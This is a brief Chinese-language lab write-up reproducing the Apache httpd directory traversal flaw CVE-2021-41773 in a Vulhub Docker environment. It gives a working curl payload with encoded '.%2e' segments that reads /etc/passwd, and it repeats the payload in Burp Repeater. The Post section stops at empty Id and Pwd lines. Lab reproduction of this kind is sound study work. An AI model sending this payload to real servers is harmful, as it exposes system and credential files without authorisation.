目录穿越漏洞(CVE-2021-41773)复现

目录

漏洞描述

漏洞复现具体步骤:

用burp复现：

Get:

 Post:

---

漏洞描述

目录穿越比目录浏览、目录遍历更具破坏性，目录穿越不仅可以读取服务器中任何目录及任何文件的内容，还可以执行系统命令。

漏洞等级：高危

影响版本：

Apache httpd 2.4.49-2.4.51

准备阶段：

 环境：win7虚拟机（装有BP） kali(装有最新的docker vulhub)

漏洞复现具体步骤:

1.进入Vulhub目录中启动存在漏洞的Apache 服务器

/home/kali/vulhub/httpd/CVE-2021-41773/

2.win7访问Apache 默认的It works!页面

3.漏洞利用 

 使用如下CURL命令来发送Payload---/icons/必须是一个存在且可以访问的目录

curl -v --path-as-is http://192.168.132.10:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到已经把当前系统里的/etc/passwd里的内容已经扫出来了

用burp复现：

Get:

http://192.168.132.10:8080/icons/ 将此url 在repeater里面右键改为request请求

点击send出现下图

 

将.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 拼接在后面

 Post:

Id:

Pwd: